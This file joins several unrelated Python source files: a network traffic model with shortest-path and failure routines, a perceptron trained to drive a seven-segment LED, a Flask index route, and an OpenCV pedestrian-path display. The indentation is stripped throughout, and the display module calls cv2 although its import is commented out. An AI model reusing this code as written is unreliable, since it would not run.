Use the cutoff argument to limit the path length to consider to cut down on
the time it takes to run this call.
:param source_node_name: name of source node in path
:param dest_node_name: name of destination node in path
:param include_failed_circuits: include failed circuits in the topology
:param needed_bw: the amount of reservable bandwidth required on the path
:param cutoff: max amount of path hops
:return: Return the path(s) in dictionary form:
path = {'path': [list of all path routes]}
"""
# Define a networkx DiGraph to find the path
G = self._make_weighted_network_graph(include_failed_circuits=include_failed_circuits, needed_bw=needed_bw)
# Define the Model-style path to be built
converted_path = dict()
converted_path['path'] = []
# Find the simple paths in G between source and dest
digraph_all_paths = nx.all_simple_paths(G, source_node_name, dest_node_name, cutoff=cutoff)
try:
for path in digraph_all_paths:
model_path = self._convert_nx_path_to_model_path(path)
converted_path['path'].append(model_path)
return converted_path
except BaseException:
return converted_path
def get_shortest_path(self, source_node_name, dest_node_name, needed_bw=0):
"""
For a source and dest node name pair, find the shortest path(s) with at
least needed_bw available.
:param source_node_name: name of source node in path
:param dest_node_name: name of destination node in path
:param needed_bw: the amount of reservable bandwidth required on the path
:return: Return the shortest path in dictionary form:
shortest_path = {'path': [list of shortest path routes], 'cost': path_cost}
"""
# Define a networkx DiGraph to find the path
G = self._make_weighted_network_graph(include_failed_circuits=False, needed_bw=needed_bw)
# Define the Model-style path to be built
converted_path = dict()
converted_path['path'] = []
converted_path['cost'] = None
# Find the shortest paths in G between source and dest
digraph_shortest_paths = nx.all_shortest_paths(G, source_node_name,
dest_node_name,
weight='cost')
try:
for path in digraph_shortest_paths:
model_path = self._convert_nx_path_to_model_path(path)
converted_path['path'].append(model_path)
converted_path['cost'] = nx.shortest_path_length(G, source_node_name, dest_node_name, weight='cost')
return converted_path
except BaseException:
return converted_path
def get_shortest_path_for_routed_lsp(self, source_node_name, dest_node_name, lsp, needed_bw):
"""
For a source and dest node name pair, find the shortest path(s) with at
least needed_bw available for an LSP that is already routed.
Return the shortest path in dictionary form:
shortest_path = {'path': [list of shortest path routes], 'cost': path_cost}
"""
# Define a networkx DiGraph to find the path
G = self._make_weighted_network_graph_routed_lsp(lsp, needed_bw=needed_bw)
# Define the Model-style path to be built
converted_path = dict()
converted_path['path'] = []
converted_path['cost'] = None
# Find the shortest paths in G between source and dest
digraph_shortest_paths = nx.all_shortest_paths(G, source_node_name,
dest_node_name,
weight='cost')
try:
for path in digraph_shortest_paths:
model_path = self._convert_nx_path_to_model_path(path)
converted_path['path'].append(model_path)
converted_path['cost'] = nx.shortest_path_length(G, source_node_name,
dest_node_name, weight='cost')
return converted_path
except BaseException:
return converted_path
def _convert_nx_path_to_model_path(self, nx_graph_path):
"""Given a path from an networkx DiGraph, converts that
path to a Model style path and returns that Model style path
A networkx path is a list of nodes in order of transit.
ex: ['A', 'B', 'G', 'D', 'F']
The corresponding model style path would be:
[Interface(name = 'A-to-B', cost = 20, capacity = 125, node_object = Node('A'),
remote_node_object = Node('B'), circuit_id = 9),
Interface(name = 'B-to-G', cost = 10, capacity = 100, node_object = Node('B'),
remote_node_object = Node('G'), circuit_id = 6),
Interface(name = 'G-to-D', cost = 10, capacity = 100, node_object = Node('G'),
remote_node_object = Node('D'), circuit_id = 2),
Interface(name = 'D-to-F', cost = 10, capacity = 300, node_object = Node('D'),
remote_node_object = Node('F'), circuit_id = 1)]
"""
# Define a model-style path to build
model_path = []
# look at each hop in the path
for hop in nx_graph_path:
current_hop_index = nx_graph_path.index(hop)
next_hop_index = current_hop_index + 1
if next_hop_index < len(nx_graph_path):
next_hop = nx_graph_path[next_hop_index]
interface = self.get_interface_object_from_nodes(hop, next_hop)
model_path.append(interface)
return model_path
# NODE CALLS ######
def get_node_interfaces(self, node_name):
"""Returns list of interfaces on specified node name"""
return Node(node_name).interfaces(self)
def fail_node(self, node_name):
"""Fails specified node"""
# Find node's interfaces and fail them
ints_to_fail_iterator = (interface for interface in
self.get_node_interfaces(node_name))
for interface in ints_to_fail_iterator:
self.fail_interface(interface.name, node_name)
# Change the failed property on the specified node
self.get_node_object(node_name).failed = True
def unfail_node(self, node_name):
"""Unfails the Node with name=node_name"""
# Change the failed property on the specified node;
self.get_node_object(node_name).failed = False
# Find node's interfaces and unfail them
ints_to_unfail_iterator = (interface for interface in self.get_node_interfaces(node_name))
for interface in ints_to_unfail_iterator:
# Unfail the interfaces if the remote node is not failed
if not interface.remote_node_object.failed:
# Unfail the specific interface
self.unfail_interface(interface.name, node_name, False)
# Unfail the remote interface
remote_int = interface.get_remote_interface(self)
self.unfail_interface(remote_int.name,
remote_int.node_object.name, False)
def get_failed_node_objects(self):
"""
Returns a list of all failed nodes
"""
failed_nodes = []
for node in (node for node in self.node_objects):
if node.failed:
node_object = self.get_node_object(node.name)
failed_nodes.append(node_object)
return failed_nodes
def get_non_failed_node_objects(self):
"""Returns a list of all failed nodes"""
non_failed_nodes = []
for node in (node for node in self.node_objects):
if not node.failed:
node_object = self.get_node_object(node.name)
non_failed_nodes.append(node_object)
return non_failed_nodes
# Display calls #########
def display_interface_status(self): # pragma: no cover
"""Returns failed = True/False for each interface"""
print('Node'.ljust(12), 'Interface'.ljust(12), 'Remote Node'.ljust(12), end=' ')
print('Failed'.ljust(12))
interface_iterator = (interface for interface in self.interface_objects)
for interface in interface_iterator:
print(interface.node_object.name.ljust(12), interface.name.ljust(12), end=' ')
print(interface.remote_node_object.name.ljust(12), end=' ')
print(str(interface.failed).ljust(12))
def display_node_status(self): # pragma: no cover
"""Returns failed = True/False for each node"""
print('Node'.ljust(12), 'Failed'.ljust(12))
node_iterator = (node for node in self.node_objects)
for node in node_iterator:
print(node.name.ljust(12), str(node.failed).ljust(12))
def display_interfaces_traffic(self): # pragma: no cover
"""
A human-readable(-ish) display of interfaces and traffic on each
"""
print('Node'.ljust(12), 'Interface'.ljust(12), 'Remote Node'.ljust(12), 'Traffic'.ljust(12))
interface_iterator = (interface for interface in self.interface_objects)
for interface in interface_iterator:
print(interface.node_object.name.ljust(12), interface.name.ljust(12), end=' ')
print(interface.remote_node_object.name.ljust(12), end=' ')
print(repr(interface.traffic).ljust(12))
def display_demand_paths(self): # pragma: no cover
"""
Displays each demand and its path(s) across the network
"""
demand_iter = (demand for demand in self.demand_objects)
for demand in demand_iter:
print('demand._key is', demand._key)
print('Demand has %s paths:' % (len(demand.path)))
for path in demand.path:
pprint(path)
print()
print()
print()
def display_interface_objects(self): # pragma: no cover
"""Displays interface objects in a more human readable manner"""
for interface in self.interface_objects:
pprint(interface)
print()
def _make_weighted_network_graph(self, include_failed_circuits=True, needed_bw=0, rsvp_required=False):
"""
Returns a networkx weighted networkx digraph from
the input Model object
:param include_failed_circuits: include interfaces from currently failed
circuits in the graph?
:param needed_bw: how much reservable_bandwidth is required?
:param rsvp_required: True|False; only consider rsvp_enabled interfaces?
:return: networkx digraph with edges that conform to the needed_bw and
rsvp_required parameters
"""
G = nx.DiGraph()
# Get all the edges that meet 'failed' and 'reservable_bw' criteria
if include_failed_circuits is False:
considered_interfaces = (interface for interface in self.interface_objects
if (interface.failed is False and
interface.reservable_bandwidth >= needed_bw))
elif include_failed_circuits is True:
considered_interfaces = (interface for interface in self.interface_objects
if interface.reservable_bandwidth >= needed_bw)
if rsvp_required is True:
edge_names = ((interface.node_object.name,
interface.remote_node_object.name, interface.cost)
for interface in considered_interfaces
if interface.rsvp_enabled is True)
else:
edge_names = ((interface.node_object.name,
interface.remote_node_object.name, interface.cost)
for interface in considered_interfaces)
# Add edges to networkx DiGraph
G.add_weighted_edges_from(edge_names, weight='cost')
# Add all the nodes
node_name_iterator = (node.name for node in self.node_objects)
G.add_nodes_from(node_name_iterator)
return G
def _make_weighted_network_graph_routed_lsp(self, lsp, needed_bw=0):
"""
Looks for a new path with needed_bw reservable bandwidth for an RSVP LSP
that is currently routed.
Returns a networkx weighted network directional graph from the input Model object.
Considers edges with needed_bw of reservable_bandwidth and also takes into account
reserved_bandwidth by the lsp on Interfaces in the existing LSP path
:param lsp: RSVP LSP that is currently routed
:param needed_bw: how much bandwidth is needed for the RSVP LSP's new path
:return: networkx DiGraph with eligible edges
"""
G = nx.DiGraph()
# The Interfaces that the lsp is routed over currently
lsp_path_interfaces = lsp.path['interfaces']
# Since this is for a routed LSP, rsvp_enabled must be True and interface must
# not be failed
eligible_interface_generator = (interface for interface in self.interface_objects if
interface.failed is False and interface.rsvp_enabled is True)
eligible_interfaces = set()
# Find only the interfaces that are not failed and that have
# enough reservable_bandwidth
for interface in eligible_interface_generator:
# Add back the lsp's reserved bandwidth to Interfaces already in its path
if interface in lsp_path_interfaces:
effective_reservable_bw = interface.reservable_bandwidth + lsp.reserved_bandwidth
else:
effective_reservable_bw = interface.reservable_bandwidth
if effective_reservable_bw >= needed_bw:
eligible_interfaces.add(interface)
# Get edge names in eligible_interfaces
edge_names = ((interface.node_object.name,
interface.remote_node_object.name, interface.cost)
for interface in eligible_interfaces)
# Add edges to networkx DiGraph
G.add_weighted_edges_from(edge_names, weight='cost')
# Add all the nodes
node_name_iterator = (node.name for node in self.node_objects)
G.add_nodes_from(node_name_iterator)
return G
@classmethod
def load_model_file(cls, data_file): # TODO - make sure doc strings for this come out well in docs dir
"""
Opens a network_modeling data file and returns a model containing
the info in the data file. The data file must be of the appropriate
format to produce a valid model. This cannot be used to open
multiple models in a single python instance - there may be
unpredictable results in the info in the models.
The format for the file must be a tab separated value file.
This docstring you are reading may not display the table info
explanations/examples below correctly on https://pyntm.readthedocs.io/en/latest/api.html.
Recommend either using help(Model.load_model_file) at the python3 cli or
looking at one of the sample model data_files in github:
https://github.com/tim-fiola/network_traffic_modeler_py3/blob/master/examples/sample_network_model_file.csv
https://github.com/tim-fiola/network_traffic_modeler_py3/blob/master/examples/lsp_model_test_file.csv
The following headers must exist, with the following tab-column
names beneath:
INTERFACES_TABLE
node_object_name - name of node where interface resides
remote_node_object_name - name of remote node
name - interface name
cost - IGP cost/metric for interface
capacity - capacity
rsvp_enabled (optional) - is interface allowed to carry RSVP LSPs? True|False; default is True
percent_reservable_bandwidth (optional) - percent of capacity allowed to be reserved by RSVP LSPs; this
value should be given as a percentage value - ie 80% would be given as 80, NOT .80. Default is 100
Note - The existence of Nodes will be inferred from the INTERFACES_TABLE.
So a Node created from an Interface does not have to appear in the
NODES_TABLE unless you want to add additional attributes for the Node
such as latitude/longitude
NODES_TABLE -
name - name of node
lon - longitude (or y-coordinate)
lat - latitude (or x-coordinate)
Note - The NODES_TABLE is present for 2 reasons:
- to add a Node that has no interfaces
- and/or to add additional attributes for a Node inferred from
the INTERFACES_TABLE
DEMANDS_TABLE
source - source node name
dest - destination node name
traffic - amount of traffic on demand
name - name of demand
RSVP_LSP_TABLE (this table is optional)
source - source node name
dest - destination node name
name - name of LSP
configured_setup_bw - if LSP has a fixed, static configured setup bandwidth, place that static value here,
if LSP is auto-bandwidth, then leave this blank for the LSP
Functional model files can be found in this directory in
https://github.com/tim-fiola/network_traffic_modeler_py3/tree/master/examples
Here is an example of a data file:
INTERFACES_TABLE
node_object_name remote_node_object_name name cost capacity rsvp_enabled percent_reservable_bandwidth # noqa E501
A B A-to-B 4 100
B A B-to-A 4 100
NODES_TABLE
name lon lat
A 50 0
B 0 -50
DEMANDS_TABLE
source dest traffic name
A B 80 dmd_a_b_1
RSVP_LSP_TABLE
source dest name configured_setup_bw
A B lsp_a_b_1 10
A B lsp_a_b_2
:param data_file: file with model info
:return: Model object
"""
# TODO - allow user to add user-defined columns in NODES_TABLE and add that as an attribute to the Node
# TODO - add support for SRLGs
interface_set = set()
node_set = set()
demand_set = set()
lsp_set = set()
# Open the file with the data, read it, and split it into lines
with open(data_file, 'r') as f:
data = f.read()
lines = data.splitlines()
# Define the Interfaces from the data and extract the presence of
# Nodes from the Interface data
int_info_begin_index = 2
int_info_end_index = find_end_index(int_info_begin_index, lines)
interface_set, node_set = cls._extract_interface_data_and_implied_nodes(int_info_begin_index,
int_info_end_index, lines)
# Define the explicit nodes info from the file
nodes_info_begin_index = int_info_end_index + 3
nodes_info_end_index = find_end_index(nodes_info_begin_index, lines)
node_lines = lines[nodes_info_begin_index:nodes_info_end_index]
for node_line in node_lines:
cls._add_node_from_data(demand_set, interface_set, lines, lsp_set, node_line, node_set)
# Define the demands info
demands_info_begin_index = nodes_info_end_index + 3
demands_info_end_index = find_end_index(demands_info_begin_index, lines)
# There may or may not be LSPs in the model, so if there are not,
# set the demands_info_end_index as the last line in the file
if not demands_info_end_index:
demands_info_end_index = len(lines)
demands_lines = lines[demands_info_begin_index:demands_info_end_index]
for demand_line in demands_lines:
try:
cls._add_demand_from_data(demand_line, demand_set, lines, node_set)
except ModelException as e:
err_msg = e.args[0]
raise ModelException(err_msg)
# Define the LSP info (if present)
# If the demands_info_end_index is the same as the length of the
# lines list, then there is no LSP section
if demands_info_end_index != len(lines):
try:
cls._add_lsp_from_data(demands_info_end_index, lines, lsp_set, node_set)
except ModelException as e:
err_msg = e.args[0]
raise ModelException(err_msg)
return cls(interface_set, node_set, demand_set, lsp_set)
@classmethod
def _extract_interface_data_and_implied_nodes(cls, int_info_begin_index, int_info_end_index, lines):
"""
Extracts interface data from lines and adds Interface objects to a set.
Also extracts the implied Nodes from the Interfaces and adds those Nodes to a set.
:param int_info_begin_index: Index position in lines where interface info begins
:param int_info_end_index: Index position in lines where interface info ends
:param lines: lines of data describing a Model objects
:return: set of Interface objects, set of Node objects created from lines
"""
interface_set = set()
node_set = set()
interface_lines = lines[int_info_begin_index:int_info_end_index]
# Add the Interfaces to a set
for interface_line in interface_lines:
# Read interface characteristics
if len(interface_line.split()) == 5:
node_name, remote_node_name, name, cost, capacity = interface_line.split()
rsvp_enabled_bool = True
percent_reservable_bandwidth = 100
elif len(interface_line.split()) == 6:
node_name, remote_node_name, name, cost, capacity, rsvp_enabled = interface_line.split()
if rsvp_enabled in [True, 'T', 'True', 'true']:
rsvp_enabled_bool = True
else:
rsvp_enabled_bool = False
percent_reservable_bandwidth = 100
elif len(interface_line.split()) >= 7:
node_name, remote_node_name, name, cost, capacity, \
rsvp_enabled, percent_reservable_bandwidth = interface_line.split()
if rsvp_enabled in [True, 'T', 'True', 'true']:
rsvp_enabled_bool = True
else:
rsvp_enabled_bool = False
else:
msg = ("node_name, remote_node_name, name, cost, and capacity "
"must be defined for line {}, line index {}".format(interface_line,
lines.index(interface_line)))
raise ModelException(msg)
new_interface = Interface(name, int(cost), float(capacity), Node(node_name), Node(remote_node_name),
None, rsvp_enabled_bool, float(percent_reservable_bandwidth))
if new_interface._key not in set([interface._key for interface in interface_set]):
interface_set.add(new_interface)
else:
print("{} already exists in model; disregarding line {}".format(new_interface,
lines.index(interface_line)))
# Derive Nodes from the Interface data
if node_name not in set([node.name for node in node_set]):
node_set.add(new_interface.node_object)
if remote_node_name not in set([node.name for node in node_set]):
node_set.add(new_interface.remote_node_object)
return interface_set, node_set
def get_demand_objects_source_node(self, source_node_name):
"""
Returns list of demand objects originating at the source node
"""
demand_list = []
for demand in (demand for demand in self.demand_objects):
if demand.source_node_object.name == source_node_name:
demand_list.append(demand)
return demand_list
def get_demand_objects_dest_node(self, dest_node_name):
"""Returns list of demands objects originating at the
destination node """
demand_list = []
for demand in (demand for demand in self.demand_objects):
if demand.dest_node_object.name == dest_node_name:
demand_list.append(demand)
return demand_list
# ### SRLG Calls ### #
def get_srlg_object(self, srlg_name, raise_exception=True):
"""
Returns SRLG in self with srlg_name
:param srlg_name: name of SRLG
:param raise_exception: raise an exception if SRLG with name=srlg_name does not
exist in self
:return: None
"""
srlg_already_in_model = [srlg for srlg in self.srlg_objects if srlg.name == srlg_name]
if len(srlg_already_in_model) == 1:
return srlg_already_in_model[0] # There will only be one SRLG with srlg_name
else:
if raise_exception:
msg = "No SRLG with name {} exists in Model".format(srlg_name)
raise ModelException(msg)
else:
return None
def fail_srlg(self, srlg_name):
"""
Sets SRLG with name srlg_name to failed = True
:param srlg_name: name of SRLG to fail
:return: none
"""
srlg_to_fail = self.get_srlg_object(srlg_name)
# Find SRLG's Nodes to fail
nodes_to_fail_iterator = (node for node in self.node_objects if node in srlg_to_fail.node_objects)
for node in nodes_to_fail_iterator:
self.fail_node(node.name)
# Find SRLG's Interfaces to fail
interfaces_to_fail_iterator = (interface for interface in self.interface_objects if
interface in srlg_to_fail.interface_objects)
for interface in interfaces_to_fail_iterator:
self.fail_interface(interface.name, interface.node_object.name)
# Change the failed property on the specified srlg
srlg_to_fail.failed = True
def unfail_srlg(self, srlg_name):
"""
Sets SRLG with srlg_name to failed = False
:param srlg_name: name of SRLG to unfail
:return: none
"""
srlg_to_unfail = self.get_srlg_object(srlg_name)
# Change the failed property on the specified srlg
srlg_to_unfail.failed = False
# Find SRLG's Nodes to unfail
nodes_to_unfail_iterator = (node for node in self.node_objects if node in srlg_to_unfail.node_objects)
# Node will stay failed if it's part of another SRLG that is still failed;
# in that case, the unfail_node will create an exception; ignore that exception
for node in nodes_to_unfail_iterator:
try:
self.unfail_node(node.name)
except ModelException:
pass
# Find SRLG's Interfaces to unfail
interfaces_to_unfail_iterator = (interface for interface in self.interface_objects if
interface in srlg_to_unfail.interface_objects)
# Interface will stay failed if it's part of another SRLG that is still failed or
# if the local/remote Node is failed; in that case, the unfail_interface
# will create an exception; ignore that exception
for interface in interfaces_to_unfail_iterator:
try:
self.unfail_interface(interface.name, interface.node_object.name)
except ModelException:
pass
def add_srlg(self, srlg_name):
"""
Adds SRLG object to Model
:param srlg_name: name of SRLG
:return:
"""
if srlg_name in set([srlg.name for srlg in self.srlg_objects]):
raise ModelException("SRLG with name {} already exists in Model".format(srlg_name))
else:
srlg = SRLG(srlg_name, self)
self.srlg_objects.add(srlg)
def multiple_links_between_nodes(self):
"""
Ensures there is no more than a single interface facing a
given remote node (that there are no parallel interfaces
between nodes)
:return: a list of parallel interfaces; if
there are no parallel interfaces, the list is empty
"""
connected_nodes_list = [(interface.node_object.name + '-' + interface.remote_node_object.name) for interface
in self.interface_objects]
connected_nodes_set = set(connected_nodes_list)
# If there are parallel links between nodes, create a list of the
# parallel links, sort it, and return the list
if len(connected_nodes_list) != len(connected_nodes_set):
parallel_links = [connection for connection in connected_nodes_list if
connected_nodes_list.count(connection) > 1]
parallel_links.sort()
return parallel_links
else:
return []
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# 改为python 3.7 下可运行
# modify by xmxoxo for python3.7
import numpy as np
from functools import reduce
#感知器类
class Perceptron(object):
def __init__(self, input_num, activator):
'''
初始化感知器,设置输入参数的个数,以及激活函数。
激活函数的类型为double -> double
'''
self.activator = activator
# 权重向量初始化为0
self.weights = [0.0 for _ in range(input_num)]
# 偏置项初始化为0
self.bias = 0.0
def bias(self,b):
self.bias = b
def weights (self,w):
self.weights = w
def __str__(self):
'''
打印学习到的权重、偏置项
'''
return 'weights\t:%s bias\t:%f\n' % (list(self.weights), self.bias)
#返回感知器的所有参数
def getparm(self):
return (list(self.weights), self.bias)
def predict(self, input_vec):
'''
输入向量,输出感知器的计算结果
'''
# 把input_vec[x1,x2,x3...]和weights[w1,w2,w3,...]打包在一起
# 变成[(x1,w1),(x2,w2),(x3,w3),...]
# 然后利用map函数计算[x1*w1, x2*w2, x3*w3]
# 最后利用reduce求和
# python3.7的 map reduce函数使用方法不同
'''
# 如果zip的话 这样也可以
return self.activator(
reduce(lambda a, b: a + b,
map(lambda x: x[0] * x[1],
zip(input_vec, self.weights)
)
,0.0) + self.bias)
'''
return self.activator(
reduce(lambda a, b: a + b,
map(lambda x,w: x * w ,
input_vec, self.weights
)
,0.0) + self.bias)
def train(self, input_vecs, labels, iteration, rate):
'''
输入训练数据:一组向量、与每个向量对应的label;以及训练轮数、学习率
'''
for i in range(iteration):
self._one_iteration(input_vecs, labels, rate)
#输出训练过程
#print(self.__str__())
def _one_iteration(self, input_vecs, labels, rate):
'''
一次迭代,把所有的训练数据过一遍
'''
# 把输入和输出打包在一起,成为样本的列表[(input_vec, label), ...]
# 而每个训练样本是(input_vec, label)
samples = zip(input_vecs, labels)
# 对每个样本,按照感知器规则更新权重
for (input_vec, label) in samples:
# 计算感知器在当前权重下的输出
output = self.predict(input_vec)
# 更新权重
self._update_weights(input_vec, output, label, rate)
def _update_weights(self, input_vec, output, label, rate):
'''
按照感知器规则更新权重
'''
# 把input_vec[x1,x2,x3,...]和weights[w1,w2,w3,...]打包在一起
# 变成[(x1,w1),(x2,w2),(x3,w3),...]
# 然后利用感知器规则更新权重
# python3.7 中需要指定返回类型为list
delta = label - output
self.weights = list(map(
lambda x,w: w + rate * delta * x,
input_vec, self.weights))
# 更新bias
self.bias += rate * delta
def f(x):
'''
定义激活函数f
'''
return 1 if x > 0 else 0
#构造训练数据集 LED 7段数码
def get_training_dataset(index=0):
if not (0<=index<=6):
index = 0
# 输入向量列表
input_vecs = [
[0,0,0,0],
[0,0,0,1],
[0,0,1,0],
[0,0,1,1],
[0,1,0,0],
[0,1,0,1],
[0,1,1,0],
[0,1,1,1],
[1,0,0,0],
[1,0,0,1],
[1,0,1,0],
[1,0,1,1],
[1,1,0,0],
[1,1,0,1],
[1,1,1,0],
[1,1,1,1],
]
lst_labels = [
[1,0,1,1,0,1,1,1,1,1,1,0,1,0,1,1],
[1,1,1,1,1,0,0,1,1,1,1,0,0,1,0,0],
[1,1,0,0,1,1,1,1,1,1,1,1,0,1,0,0],
[1,0,1,1,0,1,1,0,1,1,0,1,1,1,1,0],
[1,0,1,1,0,0,1,0,1,0,1,1,1,1,1,1],
[1,0,0,0,1,1,1,0,1,1,1,1,1,0,1,1],
[0,0,1,1,1,1,1,0,1,1,1,1,0,1,1,1],
]
labels = lst_labels[index]
return input_vecs, labels
def train_perceptron(index=0):
'''
使用and真值表训练感知器
'''
# 创建感知器,输入参数个数为4,激活函数为f
p = Perceptron(4, f)
# 训练,迭代10轮, 学习速率为0.1
input_vecs, labels = get_training_dataset(index)
p.train(input_vecs, labels, 15, 0.1)
#返回训练好的感知器
return p
#测试真值表
def test_table (obj,index):
pass
print('测试结果'.center(30,'-'))
input_vecs, labels = get_training_dataset(index)
predict = [obj.predict(item) for item in input_vecs]
acc = list(map(lambda x,y: int(x==y), labels,predict))
print(labels)
print(predict)
print(acc)
print('准确率: %2.2f' % (sum(acc)/len(acc) ) )
#for item in input_vecs:
# print ('%s = %d' % ( str(item) ,obj.predict(item)))
##训练7个感知器
def transLED ():
pass
#使用一个数组来保存训练结果
lstModel = []
strSeg = "abcdefg"
for i in range(len(strSeg)):
print ('--------正在训练%s感知器--------' % strSeg[i])
# 训练感知器
perception = train_perceptron(i)
# 打印训练获得的权重
print (str(perception))
#保存到模型中
lstModel.append(perception.getparm())
# 测试
test_table(perception,i)
break #先训练一个
return 0
#模型训练完成,输出下结果:
print("--------模型训练完成,各感知器参数如下:--------")
for i in range(len(lstModel)):
print("%s 感知器参数: %s" % (strSeg[i], str(lstModel[i]) ))
##将7bit转换成LED显示
def showLED (dat):
pass
if type(dat)==str:
lstDat = list(map(lambda x:int(x),list(dat)))
else:
lstDat = dat
ret = []
for i in range(len(lstDat)):
if i in [0,3,6]:
ret.append( '-' if lstDat[i] else ' ')
else:
ret.append( '|' if lstDat[i] else ' ')
#print(ret)
strTxt = ' %s \n%s %s\n %s \n%s %s\n %s ' % (ret[0],ret[5],ret[1],ret[6],ret[4],ret[2],ret[3])
return strTxt
#测试所有LED字符
def testAllchar ():
print('测试LED字符输出:')
sTxt = '0123456789AbCdEF'
code = ["1111110","0110000","1101101","1101101", \
"0110011","1011011","1011111","1110000", \
"1111111","1111011","1110111","0011111", \
"1001110","0111101","1001111","1000111"]
for i in range(16):
print('-'*30)
print(sTxt[i],code[i])
print(showLED(code[i]))
if __name__ == '__main__':
testAllchar()
#transLED()
#python perceptronLED.py>log.txt
|
# Copyright 2020, Alex Badics, All Rights Reserved
from flask import Blueprint, render_template
from ajdb.database import Database
from hun_law.utils import Date
_blueprint = Blueprint('index', __name__)
@_blueprint.route('/')
def index() -> str:
act_set = Database.load_act_set(Date.today())
return render_template('index.html', act_set=act_set)
INDEX_BLUEPRINT = _blueprint
|
import os
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
# import cv2
# POS_MSEC = cv2.CAP_PROP_POS_MSEC
# POS_FRAMES = cv2.CAP_PROP_POS_FRAMES
class FakeDisplay:
def __init__(self, datadir):
pass
def grab_frame(self, frame_id):
pass
def plot_path(self, path, pid=-1, args=''):
pass
def plot_ped(self, pos=(0, 0), pid=-1, color=(0, 0, 192)):
pass
def show(self, title='frame'):
pass
def add_orig_frame(self, alpha=0.5):
pass
class Display:
def __init__(self, datadir):
Hfile = os.path.join(datadir, "H.txt")
mapfile = os.path.join(datadir, "map.png")
obsfile = os.path.join(datadir, "obsmat.txt")
destfile = os.path.join(datadir, "destinations.txt")
self.cap = cv2.VideoCapture(os.path.join(datadir, 'zara01.avi'))
self.H = np.loadtxt(Hfile)
self.Hinv = np.linalg.inv(self.H)
self.scale = 1
S = np.eye(3, 3)
S[0, 0] = self.scale
S[1, 1] = self.scale
self.Hinv = np.matmul(np.matmul(S, self.Hinv), np.linalg.inv(S))
# frames, timeframes, timesteps, agents = parse_annotations(self.Hinv, obsfile)
# self.obs_map = create_obstacle_map(mapfile)
destinations = np.loadtxt(destfile)
plt.ion()
plot_prediction_metrics([], [], [])
self.agent_num = 1
self.sample_num = 0
self.last_t = -1
self.do_predictions = True
self.draw_all_agents = False
self.draw_all_samples = True
self.draw_truth = True
self.draw_past = True
self.draw_plan = True
self.output = []
self.orig_frame = []
def set_frame(self, frame):
self.cap.set(POS_FRAMES, frame)
def back_one_frame(self):
frame_num = int(self.cap.get(POS_FRAMES))
self.set_frame(frame_num - 2)
def reset_frame(self):
frame_num = int(self.cap.get(POS_FRAMES))
self.set_frame(frame_num - 1)
def next_sample(self):
self.change_sample(lambda x: x + 1)
def prev_sample(self):
self.change_sample(lambda x: x - 1)
def change_sample(self, fn):
pass
def do_frame(self, agent=-1, past_plan=None, with_scores=True, multi_prediction=False):
pass
def grab_frame(self, frame_id):
if self.cap.isOpened():
self.set_frame(frame_id)
ret, self.output = self.cap.read()
self.output = cv2.resize(self.output, (0, 0), fx=self.scale, fy=self.scale, interpolation=cv2.INTER_LINEAR)
self.orig_frame = self.output.copy()
return ret
return False
def plot_ped(self, pos=(0, 0), pid=-1, color=(0, 0, 192)):
pix_loc = to_pixels(self.Hinv, np.array([pos[0], pos[1], 1.]))
cv2.circle(self.output, pix_loc, 5, color, 1, cv2.LINE_AA)
if pid >= 0:
cv2.putText(self.output, '%d' % pid, pix_loc, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 0.5, (0,0,200), 2)
def plot_path(self, path, pid=-1, args=''):
color = (255, 255, 255)
if args.startswith('b'):
color = (255, 0, 0)
elif args.startswith('g'):
color = (0, 255, 0)
elif args.startswith('r'):
color = (0, 0, 255)
elif args.startswith('m'):
color = (255, 0, 255)
elif args.startswith('y'):
color = (0, 255, 255)
for i in range(len(path)):
pos_i = path[i, 0:2]
pix_loc = to_pixels(self.Hinv, np.array([pos_i[0], pos_i[1], 1.]))
if '--' in args:
if i != 0:
cv2.line(self.output, last_loc, pix_loc, color, 1, cv2.LINE_AA)
last_loc = pix_loc
elif '.' in args:
cv2.circle(self.output, pix_loc, 3, color, -1, cv2.LINE_AA)
else:
#elif 'o' in args:
cv2.circle(self.output, pix_loc, 5, color, 1, cv2.LINE_AA)
# if pid >= 0 and i == 0:
# cv2.putText(self.output, '%d' % pid, pix_loc, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 1, (0, 0, 200), 2)
def add_orig_frame(self, alpha=0.5):
self.output = cv2.addWeighted(self.orig_frame, alpha, self.output, 1-alpha, 0)
def show(self, title='frame'):
# plt.imshow(self.output)
# plt.show()
cv2.imshow(title, self.output)
cv2.namedWindow(title, cv2.WINDOW_KEEPRATIO)
while True:
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
def plot_prediction_metrics(prediction_errors, path_errors, agents):
plt.figure(1, (10, 10))
plt.clf()
if len(prediction_errors) > 0:
plt.subplot(2, 1, 1)
plot_prediction_error('Prediction Error', prediction_errors, agents)
plt.subplot(2, 1, 2)
plot_prediction_error('Path Error', path_errors, agents)
plt.draw()
def plot_prediction_error(title, errors, agents):
plt.title(title)
plt.xlabel('Time (frames)');
plt.ylabel('Error (px)')
m = np.nanmean(errors, 1)
lines = plt.plot(errors)
meanline = plt.plot(m, 'k--', lw=4)
plt.legend(lines + meanline, ['{}'.format(a) for a in agents] + ['mean'])
def plot_nav_metrics(ped_scores, IGP_scores):
plt.clf()
if len(ped_scores) > 0:
plt.subplot(1, 2, 1)
plt.title('Path Length (px)')
plt.xlabel('IGP');
plt.ylabel('Pedestrian')
plt.scatter(IGP_scores[:, 0], ped_scores[:, 0])
plot_diag()
plt.subplot(1, 2, 2)
plt.title('Minimum Safety (px)')
plt.xlabel('IGP');
plt.ylabel('Pedestrian')
plt.scatter(IGP_scores[:, 1], ped_scores[:, 1])
plot_diag()
plt.draw()
def plot_diag():
xmin, xmax = plt.xlim()
ymin, ymax = plt.ylim()
lim = (min(0, min(xmin, ymin)), max(xmax, ymax))
plt.plot((0, 1000), (0, 1000), 'k')
plt.xlim(lim);
plt.ylim(lim)
def draw_text(frame, pt, frame_txt):
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 0.6
thickness = 1
sz, baseline = cv2.getTextSize(frame_txt, font, scale, thickness)
baseline += thickness
lower_left = (pt[0], pt[1])
pt = (pt[0], pt[1] - baseline)
upper_right = (pt[0] + sz[0], pt[1] - sz[1] - 2)
cv2.rectangle(frame, lower_left, upper_right, (0, 0, 0), -1, cv2.LINE_AA)
cv2.putText(frame, frame_txt, pt, font, scale, (0, 255, 0), thickness, cv2.LINE_AA)
return lower_left, upper_right
